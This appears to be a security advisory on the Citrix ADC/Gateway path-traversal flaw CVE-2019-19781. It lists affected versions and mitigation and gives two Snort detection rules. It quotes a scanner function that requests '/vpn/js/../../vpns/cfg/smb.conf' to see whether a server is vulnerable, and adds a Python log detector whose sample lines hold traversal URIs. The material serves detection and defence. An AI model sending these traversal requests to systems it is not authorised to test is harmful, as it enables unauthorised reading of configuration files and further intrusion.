
[CVE Vulnerability] Citrix ADC/Gateway Remote Code Execution Vulnerability (CVE-2019-19781)


References

https://github.com/trustedsec/cve-2019-19781/blob/master/cve-2019-19781_scanner.py

https://www.bleepingcomputer.com/news/security/citrix-adc-cve-2019-19781-exploits-released-fix-now/

https://support.citrix.com/article/CTX267679

https://support.citrix.com/article/CTX267027


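PoC

# Excerpt of check_server() from the TrustedSec scanner listed in the references;
# submit_url() and vulnServers are defined elsewhere in that script.
def check_server(target, targetport, verbose):
    try:
        print("Scanning for CVE-2019-19781 on: %s        " % target, end="\r") # Cleaning up output a little
        # if for some ungodly reason they are using HTTP
        if targetport == "80":
            url = ("http://%s:%s/vpn/js/../../vpns/cfg/smb.conf" % (target,targetport))
            req = submit_url(url)
        # for all other requests use HTTPS
        else:
            url = ("https://%s:%s/vpn/js/../../vpns/cfg/smb.conf" % (target,targetport))
            req = submit_url(url)
        body = str(req.content)
        # if the system is still vulnerable: every smb.conf marker must be present in the response
        if ("[global]" in body) and ("encrypt passwords" in body) and ("name resolve order" in body): # each smb.conf will contain a [global] variable
            print("[\033[91m!\033[0m] This Citrix ADC Server: %s is still vulnerable to CVE-2019-19781." % (target))
            vulnServers.append(target)
            return 1
        return 0
    except Exception as e:
        # connection errors and timeouts: report only in verbose mode
        if verbose:
            print("[-] Error while checking %s: %s" % (target, e))
        return 0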


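Overview

Advisory on a vulnerability affecting Citrix products

Because attackers can exploit this vulnerability to cause damage, users of the affected Citrix products are advised to take action by following the remediation guidance.


A vulnerability (CVE-2019-19781) in Citrix ADC and Gateway that allows an attacker to bypass authentication and execute arbitrary code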


Affected product versions

- Citrix NetScaler ADC/NetScaler Gateway version 10.5

- Citrix ADC/NetScaler Gateway version 11.1

- Citrix ADC/NetScaler Gateway version 12.0

- Citrix ADC/NetScaler Gateway version 12.1

- Citrix ADC/Gateway version 13.0

Critical (9.8)


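Remediation

Apply the interim mitigation described in the Solution section on the Citrix website.

   ※ A patch that resolves this vulnerability is scheduled to be released.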


Snort  

# The page gives these rules without sid/rev options; Snort requires a unique sid in each rule, so assign one before loading them.
alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"/../"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)

alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"%2E%2E"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)
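
The same match logic as the two Snort rules above, applied to web access logs after the fact. This is an added example, not part of the original post or of the Snort ruleset. It assumes Apache-style request fields ("METHOD URI PROTOCOL"); the function names and sample log lines are constructed for illustration. It goes beyond the rules by percent-decoding repeatedly and case-insensitively, so `%2e%2e` is treated the same as `%2E%2E`.

```python
import re
from urllib.parse import unquote

# Apache/NCSA-style request field: "METHOD URI PROTOCOL" (assumed log format)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+"')

def decode_fully(uri, max_rounds=3):
    """Percent-decode repeatedly so %2E, %2e and double-encoded %252e all become '.'."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

def is_traversal_to_vpns(raw_uri):
    """True when the URI path reaches /vpns/ and contains a '..' path segment."""
    path = decode_fully(raw_uri.split("?", 1)[0]).lower()
    if "/vpns/" not in path:
        return False
    return ".." in path.split("/")

def scan_log(lines):
    """Return (line_number, raw_uri) for every request line that matches."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and is_traversal_to_vpns(match.group(1)):
            hits.append((number, match.group(1)))
    return hits

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jan/2020:10:00:01 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Jan/2020:10:00:02 +0000] "GET /vpn/js/../../vpns/cfg/smb.conf HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/Jan/2020:10:00:03 +0000] "GET /vpn/%2E%2E/vpns/cfg/smb.conf HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/Jan/2020:10:00:04 +0000] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 403 0',
    '192.0.2.10 - - [11/Jan/2020:10:00:05 +0000] "GET /vpns/example/page.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, uri in scan_log(SAMPLE_LOG):
        print("line %d: possible CVE-2019-19781 traversal: %s" % (number, uri))
```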



